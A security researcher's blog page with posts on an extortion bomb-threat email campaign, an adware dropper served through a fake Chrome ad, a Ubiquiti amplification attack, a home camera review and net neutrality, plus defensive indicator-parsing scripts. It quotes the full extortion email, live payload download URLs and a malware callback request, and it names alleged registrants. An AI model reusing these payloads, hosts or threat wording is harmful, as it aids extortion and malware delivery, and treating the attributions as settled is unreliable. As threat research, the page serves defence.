AlphaRacks Offline

We reported a massive phishing operation taking place at AlphaRacks back in July of 2018. The spam, child porn, malware, and phishing never stopped for a moment after we wrote about AlphaRacks in 2018. The [email protected] team never responded to any direct emails between Quadranet and myself. The blog is under development, but as of 5/26/19 AlphaRacks is still offline. Here is the most recent statement from AlphaRacks:

See our article: Phishing – A Master Anglers Toolbox

Recent updates:

DeepSentinel

DeepSentinel is a new home surveillance system that combines cameras, AI, and around-the-clock monitoring to prevent break-ins, auto theft, and other domestic crimes.

DeepSentinel cameras are equipped with speakers that allow two-way communication. The speakers are rated at 104dB, which is reportedly the loudest on the market. Each kit comes with 3 cameras, 1 hub, and mounting equipment. The cameras are battery operated and reportedly last up to 2 months without recharging.

If a crime is detected, the Surveillance Center will engage local law enforcement. DeepSentinel aims to identify a threat in under 10 seconds and contact the police within 20 seconds.

System Review

Testing is in progress, as are discussions with the vendor. This is a rough write-up of the final testing I am doing with this system at home. Please note that despite any critical reviews of certain features, I am certain of two things: 1. I am here to stay, because fully managed is what I need. 2. Apps, features, bugs, and products can change with enough feedback. This is by no means a recommendation not to buy the system. I love it! My job (as always) is to show you how the marketing meets the delivery, and to highlight anything that needs development or may annoy a potential customer. I have been using it for approximately 1 month while gathering this information.

Positive:

1. Wake-up time is fast. Agents consistently verify events in a short amount of time. Tests were successful in bringing an agent to the live camera. Many other cameras I have tested seem to catch the movement 1-5 seconds after it starts. This unit always records the movement that is taking place, reliably. Another feature I like is that the clips can be 1.5-2 min long if necessary. Other devices have predefined lengths that cut off the activity prematurely.

2. Battery life is good/acceptable for cameras with 1-2 bars and heavy traffic in front of them. My cameras have been up for 1 month. Batteries are 61% (Front), 57% (Back Door), 27% (Driveway). The extra battery is a nice touch. It took me a little while to realize you can rip the top off of the hub to charge it.

3. The app is evolving with new features. Alerts have become more specific, and the privacy mode is much more flexible. The initial maximum of 3 hours was a mistake; 24hr is great, and a schedule would be even better. One downside to privacy mode is that it stops recording locally altogether. It would be nice to choose whether to keep storing footage locally on the box. The idea (in my mind) was to stop escalating it to the SOC.

Issues:

1. Picture Quality – Overall picture quality of snippets and recordings is low. The vendor stated this is to expedite uploading to the Operations Center. I find the quality locally on my end remains poor. It would be hard to identify a license plate or letters on a van for example. I don’t doubt that the camera is capable of more but I can see that it’s throttled down for the reason specified and perhaps others like preserving battery life, storage space, or other resources. My thought is that this might record full quality and then commit a lesser quality image to the Operations Center. There is a balance of evidentiary interest with these minor details in addition to the live response.

2. Opened a ticket with the Support Team to investigate an unexpected outage of my system in the first 14 days. I didn’t make any changes other than rebooting the system a few times. On my first escalation, the rep explained it away as one of those situations where a device crashes. I recommended avoiding that kind of rationalization in this instance. It’s much wiser to use support as a point to collect those technical details. I want to know if my box is going to crash every 14 days. Reboots don’t address root causes. The vendor has been responsive and contacted me about this multiple times. No crashes since that time.

3. The camera appears to inspect 100% of all movement. Dogs, a spider, people walking by 100 times in 5 minutes. I have not personally witnessed any kind of AI. Every time there is movement it’s verified by an agent. I’m trying to make the connection between AI Assisted and a fully managed service that manually checks 100% of all notifications. This is not evident in my usage of the product. I am waiting for the vendor to explain where the technology comes into play. I need somebody to draw me that line… We all know of the 100s of vendors who sell AI, but the execution seems to be largely reliant on humans. Maybe it’s in the roadmap? Learning mode?

^^ Turkey Burglar or Burger? I can’t decide. My Actual Intelligence determined this is a bird, not a threat. The vendor’s marketing says: “We focus on what matters most … Coupled with Artificial-Intelligence, we distinguish between a potential intruder and a car, dog (^turkey?) or other non-threats.” I’m sure it’s in a hyper-excited type of ‘learning’ mode, but I’m just saying… I don’t know or understand a lot about “how” it’s going to learn, and when to expect that to kick in. I don’t doubt it’s coming, but I seek more information on what’s next for my system. For now, I don’t mind if they keep an eye on my turkeys.

4. Delayed alerts, false alarms with cameras going online/offline. The app seems to be evolving its notification styles on Android. I have seen alerts that there was activity at my Front Door, but then the clip is for the Back Door. Other times it alerts, but the clip is from a past time. It’s not clear if this is known, but the app seems to be producing lots of alerts that apply to events which already happened, or there’s no video waiting when I open the application to see that alert’s contents. It might be something that’s going on with my phone. It’s not annoying enough to cause any issues. I do have ComCrap internet service…

5. Adjusting the area of coverage in some cases took away from areas within that border. I am still experimenting but it seemed like the ideal way to keep it was expanding the coverage completely. I tried to reduce it in some areas to avoid a road with cars passing by in the distance. It has recently stopped firing on those cars so the AI may have learned this pattern. Previously I had dozens of recordings showing cars far in the distance moving laterally to my yard. (Vendor responded and made adjustments on 5/24)

6. Many situations where I select a camera and after 0-60 seconds it’s still loading. At this moment I have rebooted my phone and the hub several times and still cannot load my cameras in a live view. It displays a message that it’s having trouble reaching cameras. I can’t do it at all no matter how many times I try with app version 345. The camera also hangs when it has a live alert and I click into it while an event is taking place. (Vendor replaced a defective camera on 5/28)

7. Wireless between the cameras and hub is just OK. It’s not terrible, but it’s also not spectacular. There are no antennas on the hub, and it’s a 2.4GHz connection. I spoke with the company about this and they quickly sent me a few repeaters. Mind you, my wireless box has 4 antennas and 75% strength in the positions of the cameras. It’s not up to me, though; I have to use the wireless built into the system and can’t leverage my own. (Vendor provided WiFi extender on 5/29)

Unifi USG DDoS Amplification

We suspect a new Ubiquiti DDoS taking advantage of open UDP/10001 on the USG (Universal Security Gateway) firewall. These packets are overloading devices with amplification packets going outbound from business and home user networks. The issue started yesterday; the firewall has a large capacity that’s being completely utilized. We are investigating further to confirm the attack reported by @ZDNET, and seeking more information on who’s building the tools and which organizations are being attacked.

Blog is under development…

https://www.zdnet.com/article/over-485000-ubiquiti-devices-vulnerable-to-new-attack/

https://blog.rapid7.com/2019/02/01/ubiquiti-discovery-service-exposures/
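One way a defender can confirm the outbound amplification described above from their own firewall logs, as an added example that is not part of the original post: the discovery service answers from UDP port 10001, so a reflector shows up as a single internal host emitting UDP packets with source port 10001 toward many distinct external addresses. The log line format, the internal address ranges and the sample lines below are all constructed for the example, not the USG’s real log syntax.

```python
"""Flag internal hosts that look like UDP/10001 amplification reflectors.

Added example; the log format is constructed ("PROTO src:sport -> dst:dport bytes")
and the internal ranges are an assumption about the monitored site.
"""
import ipaddress
import re
from collections import defaultdict

# Assumed internal address space of the monitored site.
INTERNAL_NETS = [ipaddress.ip_network("192.168.0.0/16"),
                 ipaddress.ip_network("10.0.0.0/8")]

# Constructed sample firewall lines: one device replying from port 10001 to
# six different external hosts, plus ordinary client traffic for contrast.
SAMPLE_LOGS = """\
UDP 192.168.1.1:10001 -> 203.0.113.5:53 820
UDP 192.168.1.1:10001 -> 203.0.113.9:80 815
UDP 192.168.1.1:10001 -> 203.0.113.12:443 811
UDP 192.168.1.1:10001 -> 203.0.113.14:123 818
UDP 192.168.1.1:10001 -> 203.0.113.20:2222 830
UDP 192.168.1.1:10001 -> 203.0.113.21:3333 826
UDP 192.168.1.1:10001 -> 192.168.1.50:37000 400
UDP 192.168.1.50:55123 -> 198.51.100.7:443 120
TCP 192.168.1.50:42000 -> 198.51.100.8:443 60
"""

LINE_RE = re.compile(
    r"^(?P<proto>UDP|TCP)\s+(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+"
    r"(?P<dst>[\d.]+):(?P<dport>\d+)\s+(?P<bytes>\d+)$")


def is_internal(ip_str):
    """True if the address lies in one of the site's internal ranges."""
    ip = ipaddress.ip_address(ip_str)
    return any(ip in net for net in INTERNAL_NETS)


def parse_logs(text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rec = m.groupdict()
            for key in ("sport", "dport", "bytes"):
                rec[key] = int(rec[key])
            yield rec


def find_reflectors(text, min_targets=3):
    """Return {internal_src: stats} for hosts sending UDP from port 10001 to at
    least `min_targets` distinct external addresses (reflection behaviour)."""
    stats = defaultdict(lambda: {"targets": set(), "packets": 0, "bytes": 0})
    for rec in parse_logs(text):
        if rec["proto"] != "UDP" or rec["sport"] != 10001:
            continue
        # Only internal -> external traffic counts; replies to LAN hosts are
        # normal UniFi discovery and are ignored.
        if not is_internal(rec["src"]) or is_internal(rec["dst"]):
            continue
        s = stats[rec["src"]]
        s["targets"].add(rec["dst"])
        s["packets"] += 1
        s["bytes"] += rec["bytes"]
    return {
        src: {"targets": sorted(s["targets"]), "packets": s["packets"],
              "bytes": s["bytes"], "avg_bytes": s["bytes"] // s["packets"]}
        for src, s in stats.items() if len(s["targets"]) >= min_targets
    }


if __name__ == "__main__":
    for src, s in find_reflectors(SAMPLE_LOGS).items():
        print(f"{src}: {s['packets']} pkts to {len(s['targets'])} hosts, "
              f"avg {s['avg_bytes']} bytes each")
```

The distinct-destination count is the useful signal: a legitimate controller talks to a handful of known hosts, while a reflector is answering whoever the attacker spoofed. Any host the function reports should have UDP/10001 closed at the WAN edge.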

Bomb Threat E-mails

A developing story where a wave of e-mails around the United States has caused mass hysteria and evacuations. I’ve obtained two domains from a trusted source who manages hundreds of clients. Below I provide an example of the e-mail, and move on to start investigating the domains. As always I’m asking for others to independently look into these domains. I will be updating the blog as I obtain information about this issue.

Data for the domains came from various sources but is relatively self-evident, as the headers match the From: address in this instance. Below is a list of domains with corresponding IP addresses that all point to the same provider’s network. In some cases, the key seems to be what the domain was doing before it moved over to the new Russian host. One pattern I’ve found is that most of them were pointing to GoDaddy just prior to changing over to REG.RU. I couldn’t find many that had a front page or legitimate use. See below for a deep dive on 11 different domains/IPs sending these messages.

Example:

“Subject: Do not waste your time

Hello. My man hid an explosive device (Hexogen) in the building where your business is conducted. My mercenary assembled the explosive device according to my guide. It has small dimensions and it is covered up very carefully, it is impossible to damage the building structure by my bomb, but in the case of its detonation there will be many victims.

My recruited person keeps the area under the control. If any unusual behavior or cop is noticed he will power the bomb.

I can call off my man if you make a transfer. 20.000 dollars is the cost for your life and business. Pay it to me in BTC and I warrant that I will withdraw my man and the device won’t detonate. But do not try to cheat- my guarantee will become valid only after 3 confirmations in blockchain network.

My payment details (Bitcoin address): (REMOVED)

You must solve problems with the transaction by the end of the workday, if you are late with the money the device will detonate.

Nothing personal this is just a business, if you don’t transfer me the bitcoins and a bomb explodes, next time other companies will send me more money, because this is not a one-time action.

For my safety, I will no longer log into this email. I check my address every forty min and if I receive the payment I will order my person to get away.

If the explosive device detonates and the authorities see this letter:

We are not terrorists and dont assume any liability for explosions in other places.”

Deeper Investigation

I’ve accumulated a total of 11 domains/IPs that were actively sending as part of this campaign. They all have working SPF records and are hosted in netblocks starting with 194.58.x.x in ORG-nrRL1-RIPE, the host out of Russia called REG.RU. I’m not saying Russia is behind it, as that would be a very simple answer; at this point we can’t attribute anything. I opened a ticket with the host on Thu 12/13/2018 5:38 PM PST, as the services were still up and running with no takedown requests, not surprisingly. They responded Fri 12/14/2018 4:31 AM PST that ‘Service is blocked’. Despite all of the media coverage and expert analysis, not one person contacted the source of the e-mails to prevent further activity. In fact, as you’ll see below, this is the same host/subnet used in the most recent sextortion emails.
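“Working SPF records” means the sending IP in the header falls inside an ip4: mechanism the domain publishes, so the mail passes SPF even though the domain was only parked for this campaign. As an added example (not part of the original post), here is an offline evaluator for the ip4/ip6/all mechanisms, plus a helper that lists the networks a record authorizes so you can see which netblock a set of campaign domains share. The records below are constructed and are not the real DNS data of the domains listed in this post; mechanisms that need DNS (include, a, mx, ptr, exists) are reported as unresolved rather than looked up.

```python
"""Offline SPF check for ip4/ip6/all mechanisms (added example).

Constructed records only; a real check would also resolve include/a/mx.
"""
import ipaddress

QUALIFIERS = {"+": "PASS", "-": "FAIL", "~": "SOFTFAIL", "?": "NEUTRAL"}
DNS_MECHANISMS = {"include", "a", "mx", "ptr", "exists"}

# Constructed example records (assumption; not the domains' real SPF data).
RECORDS = {
    "sender.example": "v=spf1 ip4:194.58.103.231 ip4:194.58.58.0/24 -all",
    "legacy.example": "v=spf1 ip4:50.63.202.46 ~all",
    "vague.example": "v=spf1 include:_spf.other.example ?all",
}


def evaluate_spf(record, sender_ip):
    """Return (result, matched_term) for a sender IP against one SPF record.

    result is PASS/FAIL/SOFTFAIL/NEUTRAL from the matching mechanism's
    qualifier, NONE for a non-SPF record, UNRESOLVED when a DNS-dependent
    mechanism is reached before any match, or PERMERROR for a bad term.
    """
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return ("NONE", None)
    ip = ipaddress.ip_address(sender_ip)
    for term in terms[1:]:
        if "=" in term:
            # Modifiers such as redirect= or exp= are ignored offline.
            continue
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        name, _, arg = term.partition(":")
        name = name.lower()
        if name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return ("PERMERROR", term)
            if ip.version == net.version and ip in net:
                return (QUALIFIERS[qualifier], qualifier + term)
        elif name == "all":
            return (QUALIFIERS[qualifier], qualifier + "all")
        elif name in DNS_MECHANISMS:
            return ("UNRESOLVED", term)
        else:
            return ("PERMERROR", term)
    # No mechanism matched and no "all": RFC 7208 defaults to neutral.
    return ("NEUTRAL", None)


def authorized_networks(record):
    """List the ip4:/ip6: networks a record explicitly authorizes."""
    nets = []
    for term in record.split()[1:]:
        term = term.lstrip("+-~?")
        name, _, arg = term.partition(":")
        if name.lower() in ("ip4", "ip6"):
            nets.append(str(ipaddress.ip_network(arg, strict=False)))
    return nets


def check_campaign(records, sender_ip):
    """Evaluate one sender IP against every domain's record."""
    return {domain: evaluate_spf(rec, sender_ip)[0]
            for domain, rec in records.items()}


if __name__ == "__main__":
    for domain, result in check_campaign(RECORDS, "194.58.58.54").items():
        print(f"{domain}: {result} (authorizes {authorized_networks(RECORDS[domain])})")
```

A PASS here only says the domain owner listed that host; when a dozen unrelated domains all authorize the same fresh /24 at one provider, the SPF records are evidence of coordination, not legitimacy.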

Note: The e-mail below is a sextortion threat from late Oct of this year using the domain albionstudios_com. That domain still resolves to the ISP the threats came from, which strongly suggests the same individuals have recently run sextortion spam jobs from the same source network.

Here is an example header from the bomb threats:

Network Map (2 of the 11 below)

VirusTotal Graph

Godaddy IPs that some of these domains had before the A records changed over to REG.RU based on passive DNS from DomainTools + VirusTotal records:

50.63.202.48
184.168.221.57
184.168.221.9
103.1.175.1
50.63.202.62
50.63.202.82
91.195.240.82
50.63.202.46

Domain #1: yinnyang.com (194.58.103.231) (Previously: 50.63.202.46)

SPF record checks out for both hosts during the campaign:

Search shows that the IP for this domain was changed today after being stuck on another address for several years:

Current IP:

Current IP address search on VirusTotal shows a number of other domains associated with the IP

Looking at the previous IP address right before it switched:


The previous IP this domain was pointing to is regularly seen communicating with malware; the volume of files associated with this address is off the charts. It’s obviously a Command & Control point for malware communication, probably a throwaway at GoDaddy that’s still being used. The key here is checking the other domains (many of which have no legitimate front page) for these kinds of connections, as the large majority suddenly made the DNS switch today for this campaign.

Malware Families associated with previous IP of the domain


Domain #2: armiracles.com (194.58.61.73)

Domain #3: Tiedeman.com (194.58.58.207) (Previously: 95.170.70.225)

Domain #4: wedgeze.com (194.58.58.54)

Domain #5: weimd.com (194.58.58.23)

Domain #6: whathappensatdeath.com (194.58.61.134)

Domain #7: vinight.com (194.58.58.82) (Previously: 184.168.221.9)

Domain #8: theweightlossarea.com (194.58.58.125)

Domain #9: worldfused.com (194.58.61.67) (Previously: 50.63.202.62)

Domain #10: tvlgbt.com (194.58.58.123)

Domain #11: truockhichet.com (194.58.58.106)

Adware Empire – IronSource and InstallCore

A recent Adware campaign using malicious Bing ads led me to a Chrome download that eventually deployed Adware to the user’s computer. The IPs and types of Adware connected back to IronSource Ltd., Babylon Software Ltd., and InstallCore – all Israeli companies that have connections to Adware. See here, and here.

(Note: This was reported heavily by the media, including ZDNet, On MSFT, Inquirer, and Alphr, in recent days. My discovery of the malicious ads was independent of any other source. My list of 3,500 IronSource hostnames is exclusive, as is all of the IP research behind the Adware.)

At this time, there appears to be a publisher that’s steering users to a network of sites that deliver a payload of Adware. Please note that I have made only tangential connections between said publisher and the aforementioned companies. Various IP addresses and analysis of the Adware point to IronSource as the controlling entity of the servers that the Adware is communicating with after it’s delivered. That’s not to say that IronSource is necessarily aware that a publisher (pay-per-install) is redirecting visitors to sites that impersonate Google Chrome.

The process began by searching Bing.com for “Download Chrome.” The ad at the top of the returned page below looks like a legitimate Chrome advertisement and has an “Ad” marker clearly visible, but it’s poisoned because it leads to a false Google Chrome domain.

Notice how the ad below says “Chrome is a fast,secure” browser. No, I didn’t make a typo – there is a missing space before the word “secure”!


The fake chrome website googleonline2018.com is presented to the user when they click the ad above.


Clicking ‘Download Chrome‘ leads the user to a URL:

files.drivedowns.com/direct/?cod=24620&name=GoogleChrome
🍪
302 Redirect
Which leads to another URL with the payload:
www.tasetofeni.com/y94jg5t/ChromeSetup.exe 
SHA256: a61c027efb9c0ea3448ef584302c987af508a07d8347c20e8f373d847034ba7c

^^ File above on VirusTotal (1/70) is only detected by BitDefender. Here’s the JoeSandBox Malware Analysis. Malware type delivered is DealAgent, which is considered as Adware.

We discovered a number of different Adware families being delivered from the hosts this file communicated with including Amonetize, BitVote Miner, Babylon Toolbar, InstallCore, Strictor, DealPly, InstallMiez (MacOS), OpenCandy, Optimizer Pro, SProtector, Crepreote, Advanced Mac Cleaner, Vittalia, OpinionSpy, Spynion, and Adware going by many other names across all of the IPs involved. There was also a prevalence of macOS unwanted programs and Adware communicating to these hosts, similar to a Command & Control infrastructure in malware. (JoeSandBox Malware Analysis)

A video below shows the full sequence of events:

We’ve compiled a video of the event and screenshots to walk through the process of encountering the Adware. In our video, the Antivirus Bitdefender blocks the attack, and it was the only one out of 70 other engines that detected it on VirusTotal. See JoeSandBox full analysis.

Deeper Investigation

***Update #1. Check out this list of 3,500 IronSource hostnames still active!

***Update #2. Related IP address in a block owned by IronSource: 199.58.87.151. It contains interesting files that appear to be payloads for the Adware applications. Curiously, a few are named KAVcompatibilityCheck.cis and Symantec_Norton_IronSourcev5.cis. Here’s a zip of the files I downloaded from the URLs in VirusTotal. Can you analyze these?

Below, I will investigate three domains. One belongs to the publisher, and the other two appear to funnel traffic using a referrer ID to a payload domain with round-robin DNS. Several of the IPs it resolves to belong to IronSource, based on WHOIS Records. Others are unidentified, but given the identical file structure and activity, I’d say there’s a great chance they’re all connected. As you scroll down, you’ll find a piece of evidence. I encourage you to continue researching them and connecting the dots. Let me know what you find…

Domain #1: googleonline.com

The landing page googleonline2018.com is a 116-day-old domain, registered by [email protected] at an IP address 149.28.73.46 that reportedly belongs to Vultr Holdings, LLC.

Example of the site googleonline2018.com:

A number of other domains are registered to this user with the word “Chrome” or “Google” in them.

There are two other domains that stand out like the atracksys.com (1st domain name on list above). They don’t seem to fit the profile of the fake Chrome sites. They are inccweb.com and necisoft.com, listed below from 3 to 4 years ago.

Information on registrar:

Blog @ 163.com no logins since 2007 – http://richard86811.blog.163.com/

Pastebin link https://pastebin.com/sai42Sdw has “456223”, “richard86811”, “868118918”, and “[email protected]”. These are held in a DB dump (of some kind) that reveals another email associated with the Gmail used to register these domains. The number 86 is the country code for China, and 86-811-8918 could potentially be a partial phone number.

Names associated with domains: Jiaqiang Li (Jiangmen & Guangdong, China) and Chen Weilong (Guangdong, China).

Domain #2: drivedowns.com

This domain is the initial redirector after you click Download Chrome. It’s a 20-day-old domain currently being protected by Cloudflare. It’s not uncommon to see malicious sites behind Cloudflare. I’ve made dozens of attempts to report abuse to this vendor, only to be rebuffed and told that “Our service is a pass-thru and we do not control the content of our customers.”

The VirusTotal results show not only that this domain is rated as malware by Fortinet, PREBYTES, and Scumware.org, but that others on the same IP appear to be backdoor PHP files and other malicious-looking, randomized-type domains. These details are unrelated to this campaign, but it goes to show that Cloudflare can both protect the good guys and obfuscate the real location of the bad guys.

Domain #3: tasetofeni.com

This domain is 101 days old and has been using rotating Amazon IPs since at least 10/08/2018, based on passive DNS. This is not surprising, as we see plenty of hacked AWS accounts and/or fraudulent ones where attackers are controlling domains with no legitimate front page.

Other files with different packing are showing various levels of detection with AV Agents.

Malware ChromeSetup.exe is detected as InstallCore or a basic dropper/trojan.

The JoeSandBox analysis of these files and the domain goes into depth:

Domain #4: reholessbegise.com (dev, img, remote)

The dropped ChromeSetup.exe file communicates with a couple of subdomains on reholessbegise.com, a 35-day-old domain using AWS DNS. There is a connection between this domain and IPs owned by IronSource at LeaseWeb. Also, many of the IPs that it resolves to host the Babylon Toolbar, a piece of software made by Babylon Software Ltd. in Israel.

img.reholessbegise.com is a domain that many images are pulled from for the ChromeSetup.exe file and there’s no shortage of IPs behind it.

We resolved them with Whatsmydns globally to find a round-robin of addresses:

IPs: [199.58.87.155 (Active) 199.58.87.110 (Old), 199.58.87.151 (Old) ] (IronSource Israel via LeaseWeb)

Note how IronSource’s IP range has plenty of misleading or downright fake file names. These aren’t files that are ‘communicating’ but ones that have been pulled down from these hosts.

Check out this list of 3,500 IronSource Domains most are still active!

Note ‘InstallCore.com’ is hosted off of this IP owned by IronSource. Here’s a discussion between two hackers on a forum below about doing Adware installs for them linking the companies together. InstallCore is an ‘IronSource’ service.

LeaseWeb identifies the customer in WHOIS records:

dev.reholessbegise.com is a domain that ChromeSetup.exe talks to often, as confirmed in the sandbox analysis.

Note that each IP has a VirusTotal link to see its activity:

IP: [54.201.95.158, 35.167.192.77] –  (Amazon AWS)

IP: [185.59.222.146] (CDN77.com/Netherlands)

IP: [46.166.187.59] [85.159.237.103] (NForce Entertainment B.V.)

IP: [95.211.184.67] – (Leaseweb)

IPs: [146.185.27.45, 146.185.27.53, 209.95.37.242] (Midphase)

IP: [192.96.201.161] (CommPeak.com via LeaseWeb)

The ChromeSetup.exe file talks heavily to these hosts and grabs not only images but suspicious files. See the JoeSandBox analysis for all communications.

Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
Host: remote.reholessbegise.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

(SHA256: 168656b0a807e5fa2c016d637c0c02d83753919ac5a8f493895e9dddce1a916c)
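Turning a sandbox HTTP trace like the one above into indicators you can block or hunt for is mostly parsing, so here is an added example (not part of the original post) that does it. It splits the trace into requests, pulls the Host header and path, keeps only hosts under the domains this post identifies (reholessbegise.com, drivedowns.com, tasetofeni.com), and separately lists any paths ending in .cis, the odd extension the post notes for the payload files. The first request in the sample is the HEAD shown above; the other two requests are constructed to show a second image pull and a benign host that must not be flagged.

```python
"""Extract network IoCs from a sandbox HTTP request trace (added example)."""
import re

# Domains named in this post's investigation; suffix matching covers subdomains.
WATCHLIST = {"reholessbegise.com", "drivedowns.com", "tasetofeni.com"}

# First request is the trace line from the post; the rest are constructed.
TRACE = """\
Oct 26, 2018 6129 OUT HEAD /ofr/Solululadul/osutils.cis HTTP/1.1
Accept: */*
Host: remote.reholessbegise.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache

Oct 26, 2018 6130 OUT GET /img/banner1.png HTTP/1.1
Host: img.reholessbegise.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko

Oct 26, 2018 6131 OUT GET /update/check HTTP/1.1
Host: www.benign-vendor.example
User-Agent: Mozilla/5.0
"""

# A request line may carry a sandbox timestamp/direction prefix before the method.
REQUEST_RE = re.compile(
    r"^(?:.*?\bOUT\s+)?(?P<method>[A-Z]+)\s+(?P<path>\S+)\s+HTTP/1\.[01]\s*$")


def parse_http_trace(text):
    """Return a list of {"method", "path", "headers"} dicts, one per request."""
    requests, current = [], None
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if m:
            current = {"method": m["method"], "path": m["path"], "headers": {}}
            requests.append(current)
        elif current is not None and ":" in line:
            name, _, value = line.partition(":")
            current["headers"][name.strip().lower()] = value.strip()
    return requests


def host_matches(host, watchlist):
    """True if host equals a watchlisted domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in watchlist)


def extract_iocs(text, watchlist=WATCHLIST):
    """Collect watchlisted hosts, full URLs, and .cis payload URLs from a trace."""
    hosts, urls, payloads = set(), set(), set()
    for req in parse_http_trace(text):
        host = req["headers"].get("host")
        if not host or not host_matches(host, watchlist):
            continue
        url = f"http://{host}{req['path']}"
        hosts.add(host)
        urls.add(url)
        if req["path"].lower().endswith(".cis"):
            payloads.add(url)
    return {"hosts": sorted(hosts), "urls": sorted(urls),
            "payloads": sorted(payloads)}


if __name__ == "__main__":
    for kind, values in extract_iocs(TRACE).items():
        print(kind, values)
```

The hostnames are the durable indicator: the post shows the IPs behind img.reholessbegise.com rotating round-robin, so blocking or alerting on the domain and its subdomains holds up longer than any single address.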

Still working on this investigation…. Have any tips? Drop me a line in my contact form.

Net Neutrality – The Spirit Lives On

What if one day your Netflix suddenly stopped streaming and displayed an error message to call your Internet Service Provider for assistance? You place the call, and the provider advises that you’re currently not subscribed to the 3rd party streaming plan to access this type of content. Come to find out; the provider is now charging a fee for access to streaming content outside of its network. You’ll have to purchase a package to access Netflix or be forced to access the providers own video streaming service which comes at an additional cost. Net Neutrality rules are protections created in the spirit of a “need to ensure the openness of the Internet, preserving users’ free and nondiscriminatory access to content, applications or services available on the Internet.” (Bello & Jung, 2015).

The scenario with Netflix is but a glimpse into the reality of a world painted by those who oppose removing the protections. If a provider does make a user pay for specific services like gaming, video streaming, or establishing a remote connection to your office, it’s considered offering a “tiered service,” which differs from the unlimited subscription model of internet services today. Research suggests that repealing Net Neutrality regulations can be bad for consumers because they harm innovation and competition between providers, but also that repealing these laws allows for consumer internet traffic to be analyzed, manipulated to block content, and throttled to decrease the performance of the transmission speeds. The potential impacts to the consumer are interruptions to streaming, lower quality video, and possibly an inability to access certain types of services by requiring additional subscription fees, and some other scenarios that we’ve yet to imagine. ISPs may not be able to experiment with business models or innovate with new services in the market.

At the heart of the Net Neutrality debate is the concern that providers will be able to analyze, manipulate, throttle, or even block access to specific content on the internet. The term open internet comes to mind when thinking about the origins of the internet – an entity born free and not intended to be commercial in origin. The internet has evolved from a platform that was facilitating communication between universities, to the birth of e-commerce websites – and now services like cloud, the blockchain, or online distance learning leverage it to deliver content to every edge of the earth. It’s become a utility for all kinds of devices as well, for example, cars, refrigerators, water bottles, luggage, and even a surfboard. The possibilities are somewhat endless when you view things through the lens of the Open Internet versus the Restricted Internet. Consumers are increasingly adopting lifestyles that revolve around these services, which necessitates a discussion about the legal rights of ISPs to control information.

It’s entirely possible that ISPs will make changes that are “self-serving, and profit-maximizing goals when enhancing or degrading content carriage.” (Frieden, 2018). The service you have doesn’t currently come with the ‘package’ you have for internet access to these types of applications. What about employees who telecommute using a VPN connection to the office? Would ISPs be able to charge a premium for this kind of access, knowing that it’s for a commercial purpose? The short answer is yes; they’re able to categorize and sell products in any way that they’d like. It’s believed that “The Internet’s openness should be understood as a guiding principle that transcends each of the layers/tiers and extends throughout the digital ecosystem, and that each of the stakeholders of this ecosystem is essential to its development.” (CIGI, 2015). Keeping the spirit of the internet as an open place by integrating protections for consumers is essential to the discussion, and to actions by the FCC. Its proponents want to see these core values preserved and more transparency in how providers manage network traffic.

You might be asking yourself, is all of this for nothing? What is the real threat here, and are ISPs planning, or doing, this kind of thing today? After all, if they have never done this before, then Net Neutrality could potentially be a solution in search of a problem. Is there any history, or even potential, for abuse by these providers? The answer is yes. One situation where a violation of Net Neutrality occurred was when an organization called Public Knowledge complained to the FCC that the number two internet provider, Comcast, was throttling BitTorrent traffic. Comcast was working with a vendor, Sandvine, a company that sells ‘Active Network Intelligence,’ a service which can give ISPs better visibility into exactly what kind of traffic is on the network. In a statement, the company explained that “Sandvine determined that the use of several Peer-to-Peer protocols was regularly generating disproportionate burdens on the network, primarily on the upstream portion of the network, causing congestion that was affecting other users on the network.” (Comcast, 2008). Based on this research, Comcast had reportedly achieved wide-scale deployment of a blocking platform in 2007, until the FCC ruled that “The selective blocking of file-sharing traffic interfered with users’ rights to access the internet and to use applications of their choice.” Although Comcast had a plausible explanation, it still violated the Net Neutrality rules because it interfered with the normal transmission of information. Comcast positioned itself to analyze and interrupt certain types of legitimate communications without any transparency to its users. Notification of these practices had not been sent to its subscribers, effectively restricting any users of the BitTorrent file-sharing method, which was used at one time by NASA to accelerate the distribution of satellite data. BitTorrent is not a completely illegitimate protocol, and even if it were, the issue remains that customers were unaware of these activities. Based on this occurrence of the violation, it is entirely possible that ISPs could begin blocking traffic without the transparency provided by these regulations.

A key argument from opponents of repealing Net Neutrality rules is that it negatively impacts the innovation and competition between providers. The FCC commissioner stated that “…the regulations made things worse by limiting investment in high-speed networks and slowing broadband deployment. Under Title II, broadband network investment dropped more than 5.6% — the first time a decline has happened outside of a recession.” And went on to say that “Removing these outdated and unnecessary regulations will create a strong incentive for companies to pour resources into building better online infrastructure across the country and bringing faster, better, and cheaper Internet access to more Americans.” (FCC, 2018).

The stated intention of the government is that repealing these rules will aid in expansion in rural and hard-to-service areas, as well as higher average speeds throughout the US. They also wanted to allow ISPs to experiment with different business models, such as giving priority to medical applications, or self-driving cars. ISPs may experiment with security, home automation, and services like artificial intelligence that can help improve the quality of your experience in a meaningful way. There are limitless possibilities for how companies could innovate these products. Mainly, the concern is that small players in the market and start-ups wouldn’t be able to create unique services to compete with larger companies. In fact, the FCC found that “Title II regulations are bad for competition. They disproportionately burden the small Internet service providers and new entrants that are best positioned to introduce more competition into the broadband marketplace.” (FCC, 2017) And also that “Restoring Internet freedom will lead to greater investment in building and expanding broadband networks in rural and low-income areas as well as additional competition—leading to better, faster, cheaper Internet access for all Americans, including those on the wrong side of the digital divide.”. Based on these statements, it would appear that repealing could promote innovation among ISPs.

